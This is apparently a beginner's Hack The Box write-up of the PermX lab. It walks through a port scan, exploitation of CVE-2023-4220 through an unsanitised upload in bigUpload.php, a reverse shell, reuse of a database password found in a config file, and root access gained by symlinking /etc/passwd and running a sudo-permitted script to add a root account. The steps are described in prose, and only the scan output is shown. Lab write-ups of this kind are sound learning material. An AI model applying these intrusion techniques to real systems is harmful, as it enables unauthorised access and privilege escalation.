search

PermX Lab

Hack the Box Penetration Lab

hashtag
Reconnaissance

First up, a port scan:

┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.11.23 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.23:22
Open 10.10.11.23:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.11.23

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 10:15 PDT
Initiating Ping Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Completed Ping Scan at 10:15, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Discovered open port 80/tcp on 10.10.11.23
Discovered open port 22/tcp on 10.10.11.23
Completed Connect Scan at 10:15, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.23
Host is up, received syn-ack (0.12s latency).
Scanned at 2024-08-10 10:15:17 PDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

It looks like there are 2 ports currently open. 22/ssh and 80/http. I also quickly ran an nmap scan to see what URL I could find.

It looks like there is a website here: permx.htb. After adding this to the hosts file I made my way to it.

Press enter or click to view image in full size

It looks to be some sort of online learning platform! Time to poke around and see what I can find. Poking around the website didn’t yield much, neither did a feroxbuster scan.

Time to try and find some sub domains!

This actually turned up with something. The subdomain lms seems interesting and when I navigate to it, it leads me here:

Press enter or click to view image in full size

A log-in page. A pretty decent start. Now a quick google to see if I can find any exploits that are freely out there. It looks like there is quite a large known issue with the platform in CVE-2023–4220.

After researching the vulnerability and finding this articlearrow-up-right, it was pretty clear that I could get a shell uploaded and working with very little effort. The issue lay within a file called bigUpload.php, which allows an attacker to upload and execute a shell without the code sanitising the file’s name.

I created a small test file and tried out the exploit:

Success! The file I uploaded was able to be executed. Now for the real thing, uploading a reverse shell to gain access.

hashtag
Infiltration

The reverse shell I ended up using was from pentestmonkey. After gaining access to the system I went ahead and created a stable shell in order to work from. It also looks like there is another user that isn’t root on the system. Someone called mtz.

I was a little stuck, so I went digging and saw that sometimes its good to search for configuration files to the login applications. These might contain database locations and other information that can be used to login as other users. Learning a new way to search for specific files was also very handy for the future.

So with the location of a config file, I think it’s time to see what’s inside.

Bingo. A database with a password attached. This might give me some more information as to the logins of specific users.

After using find once again, this time with a wildcard, in order to find a database. I came across…nothing. So I just tried to login to mtz with the password above. It worked.

Okay, easier than I thought it would be. But normally the simplest answer is the right one. Right?

Anyway, after logging in I just used cd to get back their own home dir and found the user flag. Along with some other funny files:

Now its time to try and get root access. There at least seems to be a clue here in password.txt. Turns out, a lot of this stuff was junk. Next I went to check what files I could execute with sudo perms. It turns out there is a single file on the system I can do that to.

The file acl.sh however is not writeable. So I am unable to edit it right now.

This is where I get stuck most of the time. Getting root access has been a little struggle for me, being new to this I needed a little push in the right direction. I did some research and found out that symlink arrow-up-rightmight be something to proceed with.

Also a small note, whenever I logged back into the machine the next day. For some unknown reason (to me at least) this is missing:

I am still able to type and execute commands, just no clue why it vanishes, it seems very inconsistent.

Back to gaining root access. After reading up about symlinkarrow-up-right, I was able to link the main passwd file and a temporary file and proceed to gain root access and find the flag.

The first line links the /etc/passwd file to my own temp file named passwd. The second line executes the only file I have sudo privileges for, which just so happens can change files permissions. The third line just adds a root level account called root3 to my file. After which I just hunted for the root flag!

hashtag
Conclusion

This box taught me a fair bit. I learnt about linking files, search queries and where to look for stored passwords in databases. I wish I had used linPEAS from the get go, but now I know!

PreviousCap LabNextHeadless Lab

Last updated